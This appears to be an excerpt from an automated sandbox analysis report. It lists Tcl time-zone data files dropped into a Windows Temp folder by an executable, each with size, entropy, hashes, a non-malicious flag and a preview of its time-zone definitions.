                                                                                                                                                                                                                                                    Entropy (8bit):3.9435061066633796
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Volgograd) {. {-9223372036854775808 10660 0 LMT}. {-1577761060 10800 0 TSAT}. {-1411873200 10800 0 STAT}. {-1247540400 14400 0 STAT}. {-256881600 14400 0 VOLMMTT}. {354916800 18000 1 VOLST}. {370724400 14400 0 VOLT}. {386452800 18000 1 VOLST}. {402260400 14400 0 VOLT}. {417988800 18000 1 VOLST}. {433796400 14400 0 VOLT}. {449611200 18000 1 VOLST}. {465343200 14400 0 VOLT}. {481068000 18000 1 VOLST}. {496792800 14400 0 VOLT}. {512517600 18000 1 VOLST}. {528242400 14400 0 VOLT}. {543967200 18000 1 VOLST}. {559692000 14400 0 VOLT}. {575416800 18000 1 VOLST}. {591141600 14400 0 VOLT}. {606866400 10800 0 VOLMMTT}. {606870000 14400 1 VOLST}. {622594800 10800 0 VOLT}. {638319600 14400 1 VOLST}. {654649200 10800 0 VOLT}. {670374000 14400 0 VOLT}. {701820000 14400 0 MSD}. {717534000 10800 0 MSK}. {733273200 14400 1 MSD}. {748998000 10800 0
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8366
                                                                                                                                                                                                                                                    Entropy (8bit):3.731361496484662
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Warsaw) {. {-9223372036854775808 5040 0 LMT}. {-2840145840 5040 0 WMT}. {-1717032240 3600 0 CET}. {-1693706400 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1663455600 7200 1 CEST}. {-1650150000 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618696800 7200 0 EET}. {-1600473600 10800 1 EEST}. {-1587168000 7200 0 EET}. {-931734000 7200 0 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796870800 7200 0 CEST}. {-796608000 3600 0 CET}. {-778726800 7200 1 CEST}. {-762660000 3600 0 CET}. {-748486800 7200 1 CEST}. {-733273200 3600 0 CET}. {-715215600 7200 1 CEST}. {-701910000 3600 0 CET}. {-684975600 7200 1 CEST}. {-670460400 3600 0 CET}. {-654130800 7200 1 CEST}. {-639010800 3600 0 CET}. {-397094400 7200 1 CEST}. {-386812800 3600 0 CET}. {-371088000 7200 1 CEST}. {-355363200 3600 0
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):182
                                                                                                                                                                                                                                                    Entropy (8bit):4.851218990240677
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Belgrade)]} {. LoadTimeZoneFile Europe/Belgrade.}.set TZData(:Europe/Zagreb) $TZData(:Europe/Belgrade).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7236
                                                                                                                                                                                                                                                    Entropy (8bit):3.6800372625002393
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Zaporozhye) {. {-9223372036854775808 8440 0 LMT}. {-2840149240 8400 0 CUT}. {-1441160400 7200 0 EET}. {-1247536800 10800 0 MSK}. {-894769200 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-826419600 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800 0 MSK}. {606870000 14400 1 MSD}. {622594800 10800 0 MSK}. {638319600 14400 1 MSD}. {654649200 10800 0 MSK}. {670374000 10800 0 EEST}. {686091600 7200 0 EET}. {701820000 10800 1 EEST}. {7175
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7055
                                                                                                                                                                                                                                                    Entropy (8bit):3.732572949993817
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Zurich) {. {-9223372036854775808 2048 0 LMT}. {-3675198848 1786 0 BMT}. {-2385246586 3600 0 CET}. {-904435200 7200 1 CEST}. {-891129600 3600 0 CET}. {-872985600 7200 1 CEST}. {-859680000 3600 0 CET}. {347151600 3600 0 CET}. {354675600 7200 1 CEST}. {370400400 3600 0 CET}. {386125200 7200 1 CEST}. {401850000 3600 0 CET}. {417574800 7200 1 CEST}. {433299600 3600 0 CET}. {449024400 7200 1 CEST}. {465354000 3600 0 CET}. {481078800 7200 1 CEST}. {496803600 3600 0 CET}. {512528400 7200 1 CEST}. {528253200 3600 0 CET}. {543978000 7200 1 CEST}. {559702800 3600 0 CET}. {575427600 7200 1 CEST}. {591152400 3600 0 CET}. {606877200 7200 1 CEST}. {622602000 3600 0 CET}. {638326800 7200 1 CEST}. {654656400 3600 0 CET}. {670381200 7200 1 CEST}. {686106000 3600 0 CET}. {701830800 7200 1 CEST}. {717555600 3600 0 CET}. {733280400 7200 1 CEST}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):165
                                                                                                                                                                                                                                                    Entropy (8bit):4.848987525932415
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/London)]} {. LoadTimeZoneFile Europe/London.}.set TZData(:GB) $TZData(:Europe/London).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):170
                                                                                                                                                                                                                                                    Entropy (8bit):4.860435123210029
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/London)]} {. LoadTimeZoneFile Europe/London.}.set TZData(:GB-Eire) $TZData(:Europe/London).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):148
                                                                                                                                                                                                                                                    Entropy (8bit):4.817383285510599
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/GMT)]} {. LoadTimeZoneFile Etc/GMT.}.set TZData(:GMT) $TZData(:Etc/GMT).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):150
                                                                                                                                                                                                                                                    Entropy (8bit):4.868642878112439
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/GMT)]} {. LoadTimeZoneFile Etc/GMT.}.set TZData(:GMT+0) $TZData(:Etc/GMT).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):150
                                                                                                                                                                                                                                                    Entropy (8bit):4.8553095447791055
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/GMT)]} {. LoadTimeZoneFile Etc/GMT.}.set TZData(:GMT-0) $TZData(:Etc/GMT).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):149
                                                                                                                                                                                                                                                    Entropy (8bit):4.843152601955343
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/GMT)]} {. LoadTimeZoneFile Etc/GMT.}.set TZData(:GMT0) $TZData(:Etc/GMT).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):154
                                                                                                                                                                                                                                                    Entropy (8bit):4.869510201987464
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/GMT)]} {. LoadTimeZoneFile Etc/GMT.}.set TZData(:Greenwich) $TZData(:Etc/GMT).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):106
                                                                                                                                                                                                                                                    Entropy (8bit):4.860812879108152
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:HST) {. {-9223372036854775808 -36000 0 HST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):174
                                                                                                                                                                                                                                                    Entropy (8bit):4.865313867650324
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Hong_Kong)]} {. LoadTimeZoneFile Asia/Hong_Kong.}.set TZData(:Hongkong) $TZData(:Asia/Hong_Kong).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):185
                                                                                                                                                                                                                                                    Entropy (8bit):4.840758003302018
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Atlantic/Reykjavik)]} {. LoadTimeZoneFile Atlantic/Reykjavik.}.set TZData(:Iceland) $TZData(:Atlantic/Reykjavik).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):185
                                                                                                                                                                                                                                                    Entropy (8bit):4.75703014401897
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Nairobi)]} {. LoadTimeZoneFile Africa/Nairobi.}.set TZData(:Indian/Antananarivo) $TZData(:Africa/Nairobi).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):173
                                                                                                                                                                                                                                                    Entropy (8bit):4.833020200704589
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Indian/Chagos) {. {-9223372036854775808 17380 0 LMT}. {-1988167780 18000 0 IOT}. {820436400 21600 0 IOT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):148
                                                                                                                                                                                                                                                    Entropy (8bit):4.930199400393538
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx5+L6EL9FBIEW3v/kXGm2OHAWMx5vXTLyvkUKn:SlSWB9X5+LxpW3vTm2OHAnx5PTIkn
                                                                                                                                                                                                                                                    MD5:735E2827E4C8892ADF7AEF4E64CD65F4
                                                                                                                                                                                                                                                    SHA1:FE96BC6C736EEF734E72751E8D3DC6A7EEE1995D
                                                                                                                                                                                                                                                    SHA-256:21BC09EDE63865AA8F119420E03CF93694C2C6B1BD6061C780D342492352D5D8
                                                                                                                                                                                                                                                    SHA-512:49C491C8AB58A2C71DDE9C87B649A88F5A029694C6BAB556AC93502E0D619F4B7B2452CDC3F555CC417B9B034AE7507E03A863667E2CBDF60BF2C09754966FD8
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Indian/Christmas) {. {-9223372036854775808 25372 0 LMT}. {-2364102172 25200 0 CXT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):144
                                                                                                                                                                                                                                                    Entropy (8bit):4.817125950664342
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx5+L6EL9d/FkXGm2OHGXTvxoevXmVUXxXW5drv:SlSWB9X5+LxpJm2OHGXCeP3BG51
                                                                                                                                                                                                                                                    MD5:BA772BD604AA20E20DEDB92CC0897CD0
                                                                                                                                                                                                                                                    SHA1:9F088DE7AC470D50EEDB70C1C0A16EBADEE0A87C
                                                                                                                                                                                                                                                    SHA-256:F8FBAC3C0F2E587D2D57DA022DDAC1C9D9C52FFBBD5A7394EB430C4D255BEF3D
                                                                                                                                                                                                                                                    SHA-512:A9D98C4177267DA342AF54C14EEF41671AA2A40673AD3B327A3EEB0AFE6713E3AC4688563F4BA8A677D7373F89A896EA9BF30703148942071F99F349362C571D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Indian/Cocos) {. {-9223372036854775808 23260 0 LMT}. {-2209012060 23400 0 CCT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):179
                                                                                                                                                                                                                                                    Entropy (8bit):4.775639640601132
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsVVMMvwVAIgNGExVMSt+L6EL9TKlBx+DcVVMMv:SlSWB9IZaM3y7VcVAIgNTxL+LxGV+Dkr
                                                                                                                                                                                                                                                    MD5:DAD21C1CD103E6FF24ECB26ECC6CC783
                                                                                                                                                                                                                                                    SHA1:FBCCCF55EDFC882B6CB003E66B0B7E52A3E0EFDE
                                                                                                                                                                                                                                                    SHA-256:DA2F64ADC2674BE934C13992652F285927D8A44504327950678AD3B3EC285DCE
                                                                                                                                                                                                                                                    SHA-512:EA3B155D39D34AFB789F486FAA5F2B327ADB62E43FE5757D353810F9287D9E706773A034D3B2E5F050CCC2A24B31F28A8C44109CCCF43509F2B8547D107FD4A4
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Nairobi)]} {. LoadTimeZoneFile Africa/Nairobi.}.set TZData(:Indian/Comoro) $TZData(:Africa/Nairobi).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):143
                                                                                                                                                                                                                                                    Entropy (8bit):4.907767002704803
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx5+L6EL12hJFkXGm2OHv/fCF/l9vMLKAvn:SlSWB9X5+L5Mm2OHaT1HAv
                                                                                                                                                                                                                                                    MD5:11313145A089DD79DA011B5C42220102
                                                                                                                                                                                                                                                    SHA1:1D568F72456E4412288CA0AA6B85D0FCED1790CA
                                                                                                                                                                                                                                                    SHA-256:DAC12EB569D9845B61E33B52F708F885530F4548671B4EAB089810FFC5B198EB
                                                                                                                                                                                                                                                    SHA-512:EEF87466F41CB7667B3A75D96816BB8E08D12F214F07117125161A62E98CFC377CB116FD5D1A227AC7F9E8BE0DF56C78F20610DEF049B59AC3D67845EE687A80
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Indian/Kerguelen) {. {-9223372036854775808 0 0 zzz}. {-631152000 18000 0 TFT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):143
                                                                                                                                                                                                                                                    Entropy (8bit):4.89724791479221
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx5+L6ELzJMyFkXGm2OHuVdF+YvXTW1U9VxYKn:SlSWB9X5+L/TJm2OHWgYPhfLn
                                                                                                                                                                                                                                                    MD5:452D5BCD8510F07F85F4D1BA259ACB37
                                                                                                                                                                                                                                                    SHA1:5BE9FD3CB2E2733C3896F44493A7F0A3FFF87573
                                                                                                                                                                                                                                                    SHA-256:00556BBEE6555467802B08E50310B03791B503D5222D115BD45E33AEC09C21E4
                                                                                                                                                                                                                                                    SHA-512:ABA1C01400BCCEFDA856AE42773915983973E5C34210D4854F5B3BE509B0FEF66F73C7D234AFF69DD36B10BA5B57A23B0A78D9138961407B3F8B3E3A04088D3D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Indian/Mahe) {. {-9223372036854775808 13308 0 LMT}. {-2006653308 14400 0 SCT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):176
                                                                                                                                                                                                                                                    Entropy (8bit):4.844865929026798
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx5+L6ELzEyFkXGm2OHnz8evXZT5lxGYUQwGNSavYv:SlSWB9X5+L/EyJm2OHnz8ePZT5rG5QwB
                                                                                                                                                                                                                                                    MD5:8494F3ECF3431E54D340E58B23C1CA70
                                                                                                                                                                                                                                                    SHA1:1D66CB3A04E36DE5954743AE75D278BF627FFCAE
                                                                                                                                                                                                                                                    SHA-256:6E6DD01A3677146DCB426019369F7D535EB7C2FBE7ACCB3BD68987C94C1999AA
                                                                                                                                                                                                                                                    SHA-512:5DD24B5BCCC798CF8AF50CF80CE1AE2F68DA141C4C754EFF4137A726576A7794D1A68804214940156CB71DFED0126B02CFBBEDF3C8C12D396C87B14345198C62
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Indian/Maldives) {. {-9223372036854775808 17640 0 LMT}. {-2840158440 17640 0 MMT}. {-315636840 18000 0 MVT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):264
                                                                                                                                                                                                                                                    Entropy (8bit):4.577756094679277
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X5+L/Hm2OHlNndSvulvLLc0F8VhvLwBjvVFFGlvLL:MBp5+L/HmdHlNnS6M0FEZEBjVFFG9f
                                                                                                                                                                                                                                                    MD5:C4979F6B63BC9FC82FE470CB790D42BE
                                                                                                                                                                                                                                                    SHA1:E32B16C3914849846FB3A60A4291FC4B1BB6DC5F
                                                                                                                                                                                                                                                    SHA-256:3EBD40E36A9314DC5B3A28FB4FFC2FD5653A33B9CC0E389E112A8A93A8FA8A11
                                                                                                                                                                                                                                                    SHA-512:67B671A9A91EF669854F211567252CFA7158A1FEB42BD8FEB386469844E610AA51DC4CECC561FE2426660B04C30CC477CF2B45FBE7AFA56F7137B25F01447FA9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Indian/Mauritius) {. {-9223372036854775808 13800 0 LMT}. {-1988164200 14400 0 MUT}. {403041600 18000 1 MUST}. {417034800 14400 0 MUT}. {1224972000 18000 1 MUST}. {1238274000 14400 0 MUT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):180
                                                                                                                                                                                                                                                    Entropy (8bit):4.778847657463255
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsVVMMvwVAIgNGExVMSt+L6ELzO1h4DcVVMMv:SlSWB9IZaM3y7VcVAIgNTxL+L/O1h4De
                                                                                                                                                                                                                                                    MD5:D89C649468B3C22CF5FA659AE590DE53
                                                                                                                                                                                                                                                    SHA1:83DF2C14F1E51F5B89DCF6B833E421389F9F23DC
                                                                                                                                                                                                                                                    SHA-256:071D17F347B4EB9791F4929803167497822E899761654053BD774C5A899B4B9C
                                                                                                                                                                                                                                                    SHA-512:68334E11AAB0F8DCEEB787429832A60F4F0169B6112B7F74048EACFDE78F9C4D100E1E2682D188C3965E41A83477D3AECC80B73A2A8A1A80A952E59B431576A8
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Nairobi)]} {. LoadTimeZoneFile Africa/Nairobi.}.set TZData(:Indian/Mayotte) $TZData(:Africa/Nairobi).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):146
                                                                                                                                                                                                                                                    Entropy (8bit):4.954140296439627
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Indian/Reunion) {. {-9223372036854775808 13312 0 LMT}. {-1848886912 14400 0 RET}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):161
                                                                                                                                                                                                                                                    Entropy (8bit):4.757854680369306
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Tehran)]} {. LoadTimeZoneFile Asia/Tehran.}.set TZData(:Iran) $TZData(:Asia/Tehran).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):172
                                                                                                                                                                                                                                                    Entropy (8bit):4.778464205793726
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Jerusalem)]} {. LoadTimeZoneFile Asia/Jerusalem.}.set TZData(:Israel) $TZData(:Asia/Jerusalem).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):176
                                                                                                                                                                                                                                                    Entropy (8bit):4.668645988954937
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Jamaica)]} {. LoadTimeZoneFile America/Jamaica.}.set TZData(:Jamaica) $TZData(:America/Jamaica).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):159
                                                                                                                                                                                                                                                    Entropy (8bit):4.791469556628492
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
